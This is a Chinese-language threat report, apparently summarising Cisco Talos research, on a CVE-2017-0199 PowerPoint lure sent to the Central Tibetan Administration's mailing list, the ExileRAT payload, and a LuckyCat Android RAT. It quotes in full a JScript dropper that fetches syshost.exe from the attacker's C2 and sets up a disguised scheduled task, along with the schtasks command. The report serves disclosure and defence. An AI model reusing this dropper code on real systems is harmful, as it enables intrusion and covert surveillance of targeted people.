摘要

Cisco Talos研究人员发现一起代表西藏海外流亡组织（Central Tibetan Administration, CTA）的邮件列表来传播恶意PowerPoint文件的攻击活动。攻击中使用的文档是PPSX格式的，PPSX是PowerPoint放映文件格式。研究人员发现来自CTA邮件列表中的邮件中含有一个PPSX格式的附件，名为Tibet-was-never-a-part-of-China.ppsx。根据恶意软件的本质和攻击的目标，研究人员认为这更像是为了监控而不是处于经济目的。

恶意office文档

研究人员首先分析恶意文档，发现与其他攻击活动共享基础设施和payload。该活动中的C2基础设施与之前分析过的LuckyCat安卓和Windows木马有关。该C2的发现让人们识别出许多位于该C2的payload、配置等。该恶意PPSX文件是作为释放器允许攻击者执行不同的JS脚本来下载payload。

发送到CTA邮件列表的PPSX文件如下所示：

CTA邮件列表中的每个人都会收到该邮件。该邮件列表的基础设施是一家位印度公司运营的。攻击者修改了CTA邮件使用的标准Reply-To header这样所有的响应会回到属于攻击者的邮件地址mediabureauin [at] gmail.com。

邮件消息本身引用了即将到来的达赖喇嘛3月31日的60周年庆典。文档有240张幻灯片，自称是由CTA创建的。

PPSX文档实际上是从tibet.net主页下载的合法PDF文档的副本。PPSX文件名也与PDF文件名是一致的，这说明攻击者滥用了该文档。

攻击者在攻击中利用了CVE-2017-0199漏洞，office文档中的任意代码执行漏洞。该漏洞利用来源于GitHub上的一个公开脚本，代码位于slide1.xml.rels文件中。访问该文件的最好办法是解压或inflate PPSX文件来查看整个文档的内容。该文件位于/ppt/slides/_rels文件夹中。

命令解码为script:hXXp:\\27.126.188[.]212:8005\aqqee，当前是URL编码的。

相同的脚本滥用了app.xml文件。但端口号是不准确的，脚本其实并没有执行，也没有到TCP 8003端口的请求。

脚本在Threat Grid上运行的动态分析：

PPSX也会联系iplocation来执行有些地理位置相关的查询。

这会执行到C2服务器的HTTP请求，尤其是到资源aqqee。在响应的body中，研究人员看到一个伪造的HTTP响应日期Sun 16 Apr 2017。

然后C2会传播一个负责从C2下载payload syshost.exe的JS脚本。

然后通过WScript执行，并使用cmd.exe来创建计划任务Diagnostic_System_Host。

<script language='JScript'>
<![CDATA[
function getTempPath(){var wshshell=new ActiveXObject('WScript.Shell');var TempPath=wshshell.SpecialFolders('AppData');TempPath+='\\';return TempPath;};var filepath=getTempPath()+'syshost.exe';function DownURL(strRemoteURL, strLocalURL){var xmlHTTP = new ActiveXObject("Microsoft.XMLHTTP");xmlHTTP.open("Get",strRemoteURL,false);xmlHTTP.send();var adodbStream = new ActiveXObject("ADODB.Stream");adodbStream.Type = 1;adodbStream.Open();adodbStream.write(xmlHTTP.responseBody);adodbStream.SaveToFile(strLocalURL,2);adodbStream.Close();adodbStream = null;xmlHTTP = null;};DownURL("hXXp://27.126.188[.]212/2/syshost.exe",filepath);function execShell(cmdstr){var oS = new ActiveXObject('WScript.Shell');var shellcmd = 'cmd.exe /c '+cmdstr;var o = oS.Run(shellcmd,0,false);};execShell('schtasks \/create \/sc minute \/mo 1 \/tn Diagnostic_System_Host \/tr '+filepath);
]]>
</script>

该计划任务是通过cmd.exe输入来创建的，使用的名字Diagnostic_System_Host与合法系统任务名Diagnostic System Host非常相似，唯一的区别是没有下划线，这应该是恶意软件绕过检测的一种方法。

"C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn Diagnostic_System_Host /tr C:\Users\Administrator\AppData\Roaming\syshost.exe

EXILERAT恶意软件: SYSHOST.EXE

受感染的系统运行的是来源于C2的syshost.exe，也叫做ExileRAT。编译的日期与攻击活动时间是匹配的，即2019年1月30日。

ExileRAT的第一步就是执行IP location查询，并把数据写入c:\data.ini文件中。

研究人员在PE文件中识别出：

C2也是硬编码在PE文件中的：

ExileRAT是一个简单的RAT平台，可以收集系统中的信息、获取和推送文件、执行或终止进程。

C2基础设施

攻击活动中使用的C2是27.126.188.212，研究人员在C2上还发现其他含有.exe和.dll文件的开放目录，这些.exe和.dll文件有AcroRd32.exe和ccL100U.dll。这些文件在C2的/1目录下，攻击活动使用的PPSX文件在/2目录下。研究人员猜测攻击者复用了C2基础设施用于其他的攻击活动，目录中的日志文件robins.log中有到TCP 8005端口的请求。

在对C2的分析中，研究人员发现多个域名都使用了该IP地址，包括mondaynews[.]tk, peopleoffreeworld[.]tk和gmailcom[.]tw。攻击者应该是为了在钓鱼活动中诱骗用户模拟了Google的域名。

LUCKYCAT ANDROID RAT

Syshost.exe硬编码的C2服务器IP使用的域名就是mondaynews[.]tk。该域名也是LuckyCat Android RAT在1月3日创建的域名，该木马是LuckyCat 2012年RAT版本的一个新变种。在这些攻击中，新变种除了2012版本中含有的文件上传、下载、信息窃取、远程shell功能以外，还加入了文件移除、app执行、音频录制、窃取个人通讯录、SMS窃取、最近通信窃取、位置信息窃取等。2012年的命令类型如下左侧、2019年的入下右侧：

这两个版本都共享相同的文件名，大多数代码直接是复制粘贴的：

App中也包含了百度地图API：

恶意软件会检查设备上安装的app是否有root权限，如果有，应用会修改特定目录/data/data/com.tencent.mm/的权限：

在目录中，研究人员发现了微信的加密密钥。因为LuckyCat Android RAT的监控属性，研究人员断言恶意软件修改权限允许攻击者来提取这些key，然后解密聊天消息的内容。

恶意软件会在tecent目录执行chmod 777。这是通过允许恶意软件访问特定目录来获取文件、key和其他数据。然后攻击者可以利用恶意软件的upload命令来窃取信息。

结论

本次攻击活动是通过恶意手机设备管理软件（mobile device management, MDM）实现的。PPSX文档使用了CVE-2017-0199漏洞来使受害者下载额外的payload。通过分析恶意软件的本质和攻击的目标，研究人员认为这更像是为了监控而不是出于经济目的。